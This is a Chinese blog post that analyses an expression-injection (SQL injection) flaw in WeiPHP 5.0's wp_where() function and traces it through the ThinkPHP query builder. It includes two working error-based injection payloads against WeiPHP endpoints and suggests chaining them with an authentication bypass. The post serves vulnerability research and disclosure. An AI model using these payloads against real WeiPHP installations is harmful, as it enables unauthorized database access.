Weiphp exp表达式注入

警告
本文最后更新于 2019-12-11,文中内容可能已过时。

和thinkphp3.2.3的exp注入类似。

1
http://php.local/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=) and updatexml(1,concat(0x7e,user(),0x7e),1) -- +

\app\home\controller\Index::bind_follow()

20191211101117

uid直接通过I()获取

1
2
3
4
5
<?php
function I($name, $default = '', $filter = null, $datas = null)
{
    return input($name, $default, $filter);
}

然后经过 wp_where() -> where() -> find()函数

1
2
<?php
$info = M('user_follow')->where(wp_where($map))->find();

跟进 wp_where()

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
<?php
function wp_where($field)
{
    if (!is_array($field)) {
        return $field;
    }

    $res = [];
    foreach ($field as $key => $value) {
        if (is_numeric($key) || (is_array($value) && count($value) == 3)) {
            if (strtolower($value[1]) == 'exp' && !is_object($value[2])) {
                $value[2] = Db::raw($value[2]);
            }
            $res[] = $value;
        } elseif (is_array($value)) {
            if (strtolower($value[0]) == 'exp' && !is_object($value[1])) {
                $value[1] = Db::raw($value[1]);
            }
            $res[] = [
                $key,
                $value[0],
                $value[1]
            ];
        } else {
            $res[] = [
                $key,
                '=',
                $value
            ];
        }
    }
    //    dump($res);
    return $res;
}

在elseif语句中,如果传入的字段是数组,并且下标为0的值为exp,那么会执行 Db::raw()来进行表达式查询

20191211102436

跟进 Db::raw() 进入到 \think\Db::__callStatic$methodraw()

1
2
3
4
5
<?php
public static function __callStatic($method, $args)
{
    return call_user_func_array([static::connect(), $method], $args);
}

call_user_func_array回调[static::connect(),$method],跟进static::connect()

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
<?php
public static function connect($config = [], $name = false, $query = '')
{
    // 解析配置参数
    $options = self::parseConfig($config ?: self::$config);

    $query = $query ?: $options['query'];

    // 创建数据库连接对象实例
    self::$connection = Connection::instance($options, $name);

    return new $query(self::$connection);
}

20191211102708

返回的是\think\db\Query类,那么call_user_func_array回调的就是\think\db\Query类下的 raw() 方法。

继续跟进

1
2
3
4
5
6
<?php
//\think\db\Query::raw
public function raw($value)
{
    return new Expression($value);
}

发现返回的是一个表达式,最后wp_where()返回res

20191211103106

进入到where()

1
2
3
4
5
6
7
<?php
public function where($field, $op = null, $condition = null)
{
    $param = func_get_args();
    array_shift($param);
    return $this->parseWhereExp('AND', $field, $op, $condition, $param);
}

进入parseWhereExp()

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
<?php
protected function parseWhereExp($logic, $field, $op, $condition, array $param = [], $strict = false)
{
    ...省略
    if ($field instanceof Expression) {
        return $this->whereRaw($field, is_array($op) ? $op : [], $logic);
    } elseif ($strict) {
        // 使用严格模式查询
        $where = [$field, $op, $condition, $logic];
    } elseif (is_array($field)) {
        // 解析数组批量查询
        return $this->parseArrayWhereItems($field, $logic);
    }
    ...省略
    return $this;
}

满足elseif是数组条件,进入到 parseArrayWhereItems()

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?php
protected function parseArrayWhereItems($field, $logic)
{
    if (key($field) !== 0) {
        $where = [];
        foreach ($field as $key => $val) {
            if ($val instanceof Expression) {
                $where[] = [$key, 'exp', $val];
            } elseif (is_null($val)) {
                $where[] = [$key, 'NULL', ''];
            } else {
                $where[] = [$key, is_array($val) ? 'IN' : '=', $val];
            }
        }
    }
    else {
        // 数组批量查询
        $where = $field;
    }

    if (!empty($where)) {
        $this->options['where'][$logic] = isset($this->options['where'][$logic]) ? array_merge($this->options['where'][$logic], $where) : $where;
    }

    return $this;
}

合并where条件之后返回$this,然后进入到find()函数

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
<?php
public function find($data = null)
{
    if ($data instanceof Query) {
        return $data->find();
    } elseif ($data instanceof \Closure) {
        $data($this);
        $data = null;
    }

    $this->parseOptions();

    if (!is_null($data)) {
        // AR模式分析主键条件
        $this->parsePkWhere($data);
    }

    $this->options['data'] = $data;

    $result = $this->connection->find($this);

    if ($this->options['fetch_sql']) {
        return $result;
    }

    // 数据处理
    if (empty($result)) {
        return $this->resultToEmpty();
    }

    if (!empty($this->model)) {
        // 返回模型对象
        $this->resultToModel($result, $this->options);
    } else {
        $this->result($result);
    }

    return $result;
}

进入$this->connection->find($this)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
<?php
public function find(Query $query)
{
    // 分析查询表达式
    $options = $query->getOptions();
    $pk      = $query->getPk($options);

    $data = $options['data'];
    $query->setOption('limit', 1);
    ...

    $query->setOption('data', $data);

    // 生成查询SQL
    $sql = $this->builder->select($query);

    $query->removeOption('limit');

    $bind = $query->getBind();

    if (!empty($options['fetch_sql'])) {
        // 获取实际执行的SQL语句
        return $this->getRealSql($sql, $bind);
    }

    // 事件回调
    $result = $query->trigger('before_find');

    if (!$result) {
        // 执行查询
        $resultSet = $this->query($sql, $bind, $options['master'], $options['fetch_pdo']);

        if ($resultSet instanceof \PDOStatement) {
            // 返回PDOStatement对象
            return $resultSet;
        }

        $result = isset($resultSet[0]) ? $resultSet[0] : null;
    }
    ...

        return $result;
}

20191211104045

$this->builder->select($query)生成SQL语句,带入恶意SQL

20191211104703

造成注入。

20191211104738

2019/12/11 weiphp5.0官网最新版

所有使用了 wp_where() 函数并且参数可控的SQL查询均受到影响,前台后台均存在注入。

20191211110406

需要登录的点可以配合之前写的《weiphp多数模块存在未授权访问》来绕过登录进行注入。

比如

1
2
http://php.local/public/index.php/weixin/message/_send_by_group
POST:group_id[0]=exp&group_id[1]=) and updatexml(1,concat(0x7e,user(),0x7e),1) -- 

20191211105553

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。